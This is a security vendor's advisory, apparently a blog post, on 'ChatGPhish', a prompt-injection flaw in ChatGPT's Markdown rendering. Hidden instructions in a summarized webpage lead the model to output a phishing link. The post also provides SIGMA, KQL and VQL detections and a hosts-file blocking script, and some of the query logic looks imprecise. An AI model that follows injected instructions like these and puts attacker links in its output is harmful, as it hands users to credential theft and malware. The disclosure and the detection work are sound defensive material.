Back to Intelligence

ChatGPhish: OpenAI ChatGPT Markdown Rendering Vulnerability Analysis & Defense

SA
Security Arsenal Team
May 29, 2026
6 min read

Security researchers at Permiso Security have disclosed a critical vulnerability affecting OpenAI's ChatGPT platform, codenamed ChatGPhish. This finding exposes a fundamental flaw in how the chatgpt.com response renderer handles Markdown content. By leveraging implicit trust in Markdown links and images, attackers can execute prompt injections that turn the AI's output into a potent social engineering surface.

For defenders, this represents a significant shift in the threat landscape. The attack vector bypasses traditional email phishing filters because the malicious payload is generated dynamically by a trusted source—the AI model itself. Users are conditioned to trust the AI's summaries, making them highly likely to interact with attacker-provided links or download malicious files. We must treat AI output as an untrusted input channel until vendor patches are applied.

Technical Analysis

Affected Products:

  • Platform: OpenAI ChatGPT (Web Interface)
  • Domain: chatgpt.com
  • Component: Client-side Markdown response renderer

Vulnerability Mechanics: The ChatGPhish vulnerability stems from the renderer's failure to sanitize or visually distinguish user-controlled Markdown content from the model's internal reasoning. The attack chain is as follows:

  1. Prompt Injection: An attacker crafts a malicious input hidden within a webpage or document that ChatGPT is asked to summarize.
  2. AI Processing: The LLM processes the input but fails to isolate the malicious instruction from the data due to the lack of strict output sanitization.
  3. Trusted Rendering: The AI responds with Markdown containing a malicious link (e.g., [Login Here](http://evil.com)). The chatgpt.com interface renders this link without a security warning or distinct visual cue indicating it is an external, unverified reference.
  4. Exploitation: The user, trusting the AI's summary, clicks the link, leading to credential harvesting or malware delivery.

CVE Status: As of the initial disclosure by Permiso Security, a specific CVE identifier has not been formally published in the summary, but the issue is tracked as ChatGPhish. Given the high impact on integrity and user trust, this vulnerability warrants immediate attention similar to a high-severity CVSS score (likely 7.0+).

Exploitation Status:

  • Theoretical to PoC: The technique has been demonstrated by researchers. While no widespread active exploitation campaign has been confirmed in the wild yet, the barrier to entry for attackers is low, requiring no exploits beyond crafting specific prompt text.

Detection & Response

Detecting this vulnerability is challenging because it occurs within the browser's rendering of a trusted SaaS application. Standard EDRs do not inspect Markdown rendering logic. Therefore, detection relies on identifying the usage of the platform in high-risk contexts and monitoring the network interactions that may result from successful social engineering.

SIGMA Rules

YAML
---
title: ChatGPhish - Network Traffic to OpenAI ChatGPT
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects outbound connections to chatgpt.com. High volumes or unexpected usage may indicate exposure to ChatGPhish prompt injection vectors during active exploitation phases.
references:
  - https://permiso.io/blog/chatgphish-vulnerability
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.initial_access
  - attack.t1566
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains: 'chatgpt.com'
  condition: selection
falsepositives:
  - Legitimate business use of ChatGPT
level: low
---
title: ChatGPhish - Suspicious Browser Process Spawning
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
status: experimental
description: Detects browser processes spawning command-line utilities (like PowerShell or Curl) shortly after network activity to AI platforms, potentially indicating a successful social engineering click leading to script execution.
references:
  - https://permiso.io/blog/chatgphish-vulnerability
author: Security Arsenal
date: 2026/05/15
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection_browser:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_cli:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\curl.exe'
  filter_legit:
    CommandLine|contains: 'update' # Common noise
  condition: selection_browser and selection_cli and not filter_legit
falsepositives:
  - Legitimate administrative downloads triggered by user
level: high

KQL (Microsoft Sentinel / Defender)

This query hunts for traffic to chatgpt.com and correlates it with immediate connections to potentially suspicious external domains, a pattern indicative of a user clicking a link provided by the AI.

KQL — Microsoft Sentinel / Defender
let OpenAIDomains = dynamic(['chatgpt.com', 'openai.com']);
let TimeFrame = 1h;
let ChatGPTTraffic = CommonSecurityLog
| where TimeGenerated > ago(TimeFrame)
| where DestinationUrl in (OpenAIDomains) or RequestURL in (OpenAIDomains)
| project SourceIP, RequestURL, TimeGenerated, DeviceName;
let SuspiciousOutbound = DeviceNetworkEvents
| where TimeGenerated > ago(TimeFrame)
| where RemoteUrl !in (OpenAIDomains) and RemoteUrl !contains "microsoft.com" and RemoteUrl !contains "google.com" // Filter common safe
| project SourceIP, RemoteUrl, InitiatingProcessFileName, TimeGenerated;
ChatGPTTraffic
| join kind=inner (SuspiciousOutbound) on SourceIP
| where (SuspiciousOutbound.TimeGenerated - ChatGPTTraffic.TimeGenerated) < time(5m) // Click within 5 mins of viewing summary
| project TimeGenerated, SourceIP, DeviceName, ChatURL=ChatGPTTraffic.RequestURL, SuspiciousLink=SuspiciousOutbound.RemoteUrl, Process=SuspiciousOutbound.InitiatingProcessFileName

Velociraptor VQL

This Velociraptor artifact hunts for evidence of DNS queries to OpenAI platforms on the endpoint, identifying machines actively using the service that may be susceptible to the ChatGPhish vector.

VQL — Velociraptor
-- Hunt for DNS cache entries related to ChatGPT to identify exposed endpoints
SELECT 
  Timestamp, 
  Name AS Domain, 
  Type AS RecordType, 
  Data AS IP_Address
FROM dns_cache()
WHERE Name =~ 'chatgpt.com' OR Name =~ 'openai.com'
ORDER BY Timestamp DESC

Remediation Script (PowerShell)

Since the vulnerability is in the web rendering logic, endpoint patching is not applicable until OpenAI releases a fix. The most effective immediate technical control is restricting access via the HOSTS file or proxy for non-essential users. The following script adds a temporary block to the HOSTS file for high-security environments.

PowerShell
<#
.SYNOPSIS
    Hardens endpoint against ChatGPhish by blocking chatgpt.com via HOSTS file.
.DESCRIPTION
    Use only in environments where ChatGPT usage is non-essential or until the vendor 
    patches the Markdown rendering vulnerability. Requires Administrator privileges.
#>

$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$DomainToBlock = "chatgpt.com"
$RedirectIP = "127.0.0.1"

if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Error "This script must be run as Administrator."
    exit 1
}

$HostsContent = Get-Content -Path $HostsPath -ErrorAction SilentlyContinue

if ($HostsContent -match "$DomainToBlock") {
    Write-Host "[INFO] $DomainToBlock is already present in the hosts file." -ForegroundColor Yellow
} else {
    try {
        Add-Content -Path $HostsPath -Value "$RedirectIP`t$DomainToBlock"
        Write-Host "[SUCCESS] Added block for $DomainToBlock to hosts file." -ForegroundColor Green
        # Flush DNS resolver cache to apply immediately
        Clear-DnsClientCache
        Write-Host "[SUCCESS] DNS cache flushed." -ForegroundColor Green
    }
    catch {
        Write-Error "[ERROR] Failed to modify hosts file: $_"
    }
}

Remediation

  1. Vendor Coordination: Monitor official OpenAI security advisories for a patch addressing the Markdown renderer sanitization. The fix will likely involve distinct visual tagging of external links or stripping active content from untrusted sources.
  2. Network Controls (Immediate): If your organization allows access to Generative AI tools, implement aSWG (Secure Web Gateway) rule to inspect or block traffic to chatgpt.com until the patch is verified. The PowerShell script above provides a host-based fallback for critical assets.
  3. User Awareness: Immediately notify security teams and staff. The core risk is trust in the "Summary." Users must be trained to treat links generated by ChatGPT with the same suspicion as links in unsolicited emails.
  4. Data Loss Prevention (DLP): Ensure DLP rules are triggered on data exfiltration to unknown domains, even if the traffic originates from a browser session with chatgpt.com.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectionopenaichatgptprompt-injection

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action